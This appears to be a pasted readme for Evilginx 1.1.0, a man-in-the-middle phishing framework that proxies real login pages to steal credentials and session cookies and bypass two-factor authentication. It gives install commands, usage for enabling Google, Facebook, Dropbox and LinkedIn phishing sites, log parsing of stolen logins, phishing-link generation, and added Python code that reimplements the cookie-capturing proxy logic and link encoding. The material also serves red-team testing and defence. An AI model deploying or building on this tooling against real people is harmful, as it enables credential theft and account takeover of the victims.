TVT618

Evilginx - Phishing Attack Framework with 2FA Bypass

Sep 30th, 2018

About Evilginx 1.1.0 - Phishing Attack Framework with Two-factor Authentication Bypass
Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. Its core runs on the Nginx HTTP server, which uses proxy_pass and sub_filter to proxy and modify HTTP content while intercepting traffic between client and server.

You can learn how it works and how to install everything yourself on my blog:
* First post, slightly outdated now: Evilginx - Advanced Phishing With Two-factor Authentication Bypass
* Evilginx 1.0 Update: Evilginx 1.0 Update - Up Your Game in 2FA Phishing
* Evilginx 1.1 Update: Evilginx 1.1 Update

How does Evilginx 1.1.0 work?
1. Attacker generates a phishing link pointing to his server running Evilginx: https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID

Parameters in the URL stand for:
rc = On successful sign-in, the victim will be redirected to this link, e.g. a document hosted on Google Drive.
rt = The name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, Evilginx treats the sign-in as successful and redirects the victim to the URL supplied by the rc parameter.

2. Victim receives the attacker's phishing link via any available communication channel (email, messenger etc.).

3. Victim clicks the link and is presented with Evilginx's proxied Google sign-in page.

4. Victim enters his/her valid account credentials, progresses through the two-factor authentication challenge (if enabled) and is redirected to the URL specified by the rc parameter. At this point an rd cookie is saved for the notreallygoogle.com domain in the victim's browser. From now on, if this cookie is present, he/she will be immediately redirected to the rc URL when the phishing link is re-opened.

5. Attacker now has the victim's email and password, as well as session cookies that can be imported into the attacker's browser in order to take full control of the logged-in session, bypassing any two-factor authentication protections enabled on the victim's account.
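The proxy-side decisions the five steps above describe (rewriting the real site's hostnames in the proxied response, re-scoping Set-Cookie headers to the phishing domain, recording every cookie the real site sets, and treating the appearance of the cookie named by rt as proof of sign-in before redirecting to rc), written out as an added Python example. This is not Evilginx's own code and does not reproduce its Nginx configuration; the domain names and the LSID cookie name come from the page, while the function names, the POST field names and the sample upstream responses are constructed for this example.

```python
from urllib.parse import parse_qs

REAL_DOMAIN = "google.com"            # the site being proxied (from the page)
PHISH_DOMAIN = "notreallygoogle.com"  # the attacker's domain (from the page)


def rewrite_hosts(text: str) -> str:
    """sub_filter analogue: every reference to the real site in a proxied
    response (HTML, JS, Location headers) is pointed at the phishing domain,
    so accounts.google.com becomes accounts.notreallygoogle.com."""
    return text.replace(REAL_DOMAIN, PHISH_DOMAIN)


def parse_set_cookie(header: str):
    """Split one Set-Cookie header into (name, value, [(attr, attr_value), ...])."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = []
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs.append((key.strip(), val.strip()))
    return name.strip(), value, attrs


def rescope_cookie(header: str) -> str:
    """Rewrite the Domain attribute so the victim's browser stores the real
    site's cookie under the phishing domain; a Set-Cookie for google.com
    arriving from notreallygoogle.com would otherwise be rejected."""
    name, value, attrs = parse_set_cookie(header)
    out = [f"{name}={value}"]
    for key, val in attrs:
        if key.lower() == "domain":
            val = rewrite_hosts(val)
        out.append(f"{key}={val}" if val else key)
    return "; ".join(out)


def capture_credentials(post_body: str, fields=("Email", "Passwd")) -> dict:
    """Pull the login form fields out of the victim's POST as it passes through.
    The field names are an assumption for this example, not taken from the page."""
    form = parse_qs(post_body)
    return {f: form[f][0] for f in fields if f in form}


def proxy_response(headers, body: str, rt: str, rc: str) -> dict:
    """Simulate Evilginx's handling of one upstream response.

    headers: list of (name, value) pairs as the real site sent them
             (Set-Cookie may repeat, so a dict would lose entries).
    rt:      name of the session cookie that only exists after sign-in.
    rc:      URL the victim is sent to once that cookie is seen.
    Returns the response to send to the victim plus every cookie captured."""
    captured = {}
    out_headers = []
    signed_in = False
    for name, value in headers:
        if name.lower() == "set-cookie":
            cname, cvalue, _ = parse_set_cookie(value)
            captured[cname] = cvalue        # attacker imports these later
            if cname == rt:
                signed_in = True
            out_headers.append((name, rescope_cookie(value)))
        elif name.lower() == "location":
            out_headers.append((name, rewrite_hosts(value)))
        else:
            out_headers.append((name, value))
    if signed_in:
        # Session cookie observed: send the victim to rc and mark the browser
        # with the rd cookie so re-opening the link redirects immediately.
        out_headers = [h for h in out_headers if h[0].lower() != "location"]
        out_headers.append(("Set-Cookie", f"rd=1; Domain={PHISH_DOMAIN}; Path=/"))
        out_headers.append(("Location", rc))
        return {"status": 302, "headers": out_headers, "body": "", "captured": captured}
    return {"status": 200, "headers": out_headers,
            "body": rewrite_hosts(body), "captured": captured}


# Constructed sample traffic for a dry run (not real Google responses).
LOGIN_PAGE = [("Content-Type", "text/html"),
              ("Set-Cookie", "GAPS=pre-login; Domain=accounts.google.com; Path=/; Secure; HttpOnly")]
LOGIN_BODY = '<form action="https://accounts.google.com/signin/challenge/pwd">'
AFTER_LOGIN = [("Set-Cookie", "SID=abc123; Domain=.google.com; Path=/; Secure; HttpOnly"),
               ("Set-Cookie", "LSID=def456; Domain=accounts.google.com; Path=/; Secure; HttpOnly"),
               ("Location", "https://accounts.google.com/ManageAccount")]
RC = "https://www.youtube.com/watch?v=dQw4w9WgXcQ"

if __name__ == "__main__":
    print(proxy_response(LOGIN_PAGE, LOGIN_BODY, "LSID", RC))
    print(capture_credentials("Email=victim%40gmail.com&Passwd=hunter2&continue=x"))
    print(proxy_response(AFTER_LOGIN, "", "LSID", RC))
```

The first response carries only a pre-login cookie, so the victim keeps seeing the proxied page; the second sets LSID, which is the rt cookie, so the proxy captures SID and LSID and answers with a 302 to rc. Nothing here depends on the victim's password being correct: the real site decided that, which is why the credentials and cookies this captures are the valid ones.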
Let's take a few steps back and try to define the main obstacles in traditional phishing efforts.

The first and major pain with phishing for credentials is two-factor authentication. You can create the best-looking template that yields you dozens of logins and passwords, but you will eventually get roadblocked when asked for the verification token that arrived via SMS. Not only will it stop you from progressing further, but it will also tip off the account owner when they receive a login attempt alert.

The second issue with phishing templates is that they must accept any login and password, as they have no means of confirming their validity. That will, at times, leave you with invalid credentials.

The third issue is having to create phishing templates. Kuba Gretzky doesn't know about you, but for him the process of copying the site layout, stripping JavaScript, fixing CSS and writing his own replacements for the stripped JavaScript code to make the login screen behave like the original is extremely annoying. It feels bad to recreate something which has already been done.

In the past several months Kuba Gretzky has worked on his own ettercap-like HTTP proxy software written in C++, using the Boost::Asio library for maximum efficiency. He implemented SSLstrip, DNS spoofing and HSTS bypass. This solution worked perfectly in a Local Area Network, but he wondered if the same ideas could be repurposed for remote phishing, without the need to use custom-made software.

Kuba Gretzky had a revelation when he read an excellent blog post by @i_bo0om. @i_bo0om used the Nginx HTTP server's proxy_pass feature and sub_filter module to proxy the real Telegram login page to visitors, intercepting credentials and session cookies on the fly using man-in-the-middle attacks. This article made him realize that Nginx could be used as a proxy for external servers, and it sparked the idea of Evilginx. The idea was perfect - simple and yet effective.

That covers the research process behind Evilginx; what follows focuses on installation and usage.
  36.  
Disclaimer about Evilginx 1.1.0 - Phishing Attack Framework with Two-factor Authentication Bypass
I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration when setting up defenses, and to find ways to protect against this phishing method. Evilginx should be used only in legitimate penetration testing assignments with written permission from the to-be-phished parties.

Contributors Hall of Fame: @poweroftrue

Install and Run Evilginx 1.1.0:
sudo su
git clone https://github.com/kgretzky/evilginx
cd evilginx
bash install.sh
python evilginx.py

Using Evilginx 1.1.0
Setup
Enable or disable site configurations for use with the Nginx server, using the supplied Evilginx templates from the sites directory.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

List available site configuration templates:
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Enable google phishing site with preregistered phishing domain not-really-google.com:
python evilginx.py setup --enable google -d not-really-google.com

Disable facebook phishing site:
python evilginx.py setup --disable facebook

Parse
Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in the logs directory where the evilginx.py script resides. This can be done automatically if you enable auto-parsing in the Setup phase.
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Parse logs only for google site:
python evilginx.py parse -s google

Parse logs for all available sites:
python evilginx.py parse -s all

Generate URL
Generate phishing URLs that you can use in your Red Team Assessments.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Generate google phishing URL that will redirect the victim to a rickroll video on successful login:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
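The rc encoding visible in the generated links above, as an added Python example that is not Evilginx's own code. Everything after the leading "0" in the rc value is the URL-safe base64 of the -r argument with the "=" padding stripped, which is enough to reproduce both URLs from the command line shown. The leading "0" is present in the output but its meaning is not documented on this page; treating it as a fixed one-character prefix is an assumption of this example, as are the function names and the table of login paths (the two Google paths come from the output above). The decoder is also what a defender needs when triaging a suspicious link of this shape: it recovers where the victim would have been sent after sign-in.

```python
import base64
from urllib.parse import urlsplit, parse_qs

# Observed on the page: rc=0aHR0cHM6...; everything after the leading "0" is
# URL-safe base64 of the redirect URL without padding. Treating "0" as a fixed
# prefix is an assumption of this example.
RC_PREFIX = "0"

# Login paths per site, taken from the genurl output above. The page lists no
# other sites' paths, so only google is filled in.
LOGIN_PATHS = {
    "google": ("accounts", ["/ServiceLogin", "/signin/v2/identifier"]),
}


def encode_rc(redirect_url: str) -> str:
    """Encode the post-login redirect the way the generated URLs show it."""
    b64 = base64.urlsafe_b64encode(redirect_url.encode()).decode().rstrip("=")
    return RC_PREFIX + b64


def decode_rc(rc: str) -> str:
    """Recover the redirect URL from an rc parameter, restoring stripped padding."""
    if not rc.startswith(RC_PREFIX):
        raise ValueError("rc does not carry the expected prefix")
    b64 = rc[len(RC_PREFIX):]
    b64 += "=" * (-len(b64) % 4)
    return base64.urlsafe_b64decode(b64).decode()


def gen_urls(site: str, phish_domain: str, redirect_url: str) -> list:
    """Reproduce the genurl output: one phishing URL per known login path."""
    subdomain, paths = LOGIN_PATHS[site]
    rc = encode_rc(redirect_url)
    return [f"https://{subdomain}.{phish_domain}{path}?rc={rc}" for path in paths]


def redirect_from_url(url: str) -> str:
    """Defender side: pull rc out of a suspicious link and decode it."""
    query = parse_qs(urlsplit(url).query)
    return decode_rc(query["rc"][0])


if __name__ == "__main__":
    for u in gen_urls("google", "not-really-google.com",
                      "https://www.youtube.com/watch?v=dQw4w9WgXcQ"):
        print(u)
        print("  redirects to:", redirect_from_url(u))
```

Note that, unlike the hand-written link in step 1 of "How does Evilginx 1.1.0 work?", the 1.1.0 genurl output carries no rt parameter: the name of the session cookie to watch for is no longer part of the URL in this version.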
  112.  
Video demo of Evilginx 1.1.0 - Phishing Attack Framework with 2FA Bypass: https://vimeo.com/212463675

Download Evilginx 1.1.0: https://github.com/kgretzky/evilginx